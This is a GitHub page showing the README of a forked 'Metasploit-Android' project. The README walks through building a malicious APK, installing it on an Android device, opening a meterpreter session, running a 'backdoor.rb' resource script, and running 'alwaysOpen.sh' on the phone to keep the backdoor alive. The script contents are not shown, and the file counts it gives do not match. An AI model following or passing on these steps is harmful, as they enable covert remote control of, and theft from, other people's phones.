forked from 0x4156-AV/Metasploit-Android
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathREADME.txt
More file actions
33 lines (27 loc) · 958 Bytes
/
README.txt
File metadata and controls
33 lines (27 loc) · 958 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#######################################################
## Created by Aaron Vigal. http://www.aaronvigal.com ##
#######################################################
Setup:
> There should be 6 files inside of a folder named Metasploit on your Desktop
> The 4 required files are:
* alwaysOpen.sh
* exploit
* connect
* android.rb
* backdoor.rb
Step 1.
> Navigate to the Metasploit folder on the Desktop
Step 2.
> Open up a terminal and run "./exploit" if you haven't made the APK yet
> Run "./connect" if you have already made the APK
Hint: If the file doessn't have the needed permissions, run chmod +x android
Step 3. (If not already done)
> Install and run MainActivity on your android device
Step 4.
> Once a meterpreter session opens, run the following command:
"resource /root/Desktop/Metasploit/Android/backdoor.rb"
Step 5.
> Type the following 3 commands:
1. cd /
2. cd /sdcard/Download
3. sh alwaysOpen.sh